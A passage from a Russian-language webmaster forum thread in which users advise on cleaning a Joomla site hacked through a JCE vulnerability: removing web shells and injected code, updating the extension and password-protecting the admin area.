    [свернуть]

    А там он прописывается видимо через какую-нибудь уязвимость движка.
    • 1

    Спасибо сказали:

    OKyJIucT(27.02.2013),
  3. Опытный Аватар для izyalex
    • Регистрация: 20.11.2012
    • Сообщений: 254
    • Репутация: 38
    • Webmoney BL: ?
    Буду краток:
    CMS: Joomla
    Взлом: уязвимость JCE
    Вердикт:
    1) удалять web-shell скрипты
    2) чистить коды php от возможно встроенных _GET _POST
    3) чистить тело вирусов/редиректов
    4) обновлять JCE + закрыть administrator.php от посторонних глаз, например .htpasswd
    PS: я не экстрасенс, могу ошибаться, каждый случай индивидуален
    PSS: И прекратите создавать новые темы!
    Последний раз редактировалось izyalex; 27.02.2013 в 12:53.
    Сpanel хостинг и ISPmanager хостинг от 119р./мес
    VIP Премиум хостинг в Москве, 1000р./мес и не парюсь
    • 0
  4. Опытный Аватар для bridge
    • Регистрация: 16.06.2012
    • Сообщений: 380
    • Репутация: 37
    • Webmoney BL: ?
    А вы конфиги в базе проверьте еще. можна найти много каки
    • 0

Похожие темы

Темы Раздел Ответов Последний пост
Помогите найти вредоносный код.
Web программирование 11 04.10.2012 13:38
Помогите найти вредоносный код.
Вопросы от новичков 9 04.10.2012 10:56
Помогите найти вредоносный код
Вопросы от новичков 4 10.04.2012 02:12
Как проверить на вредоносный код?
Партнерские программы 7 21.01.2012 22:12
Вредоносный код на WorDpress
Дайджест блогосферы 0 18.10.2011 22:24

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры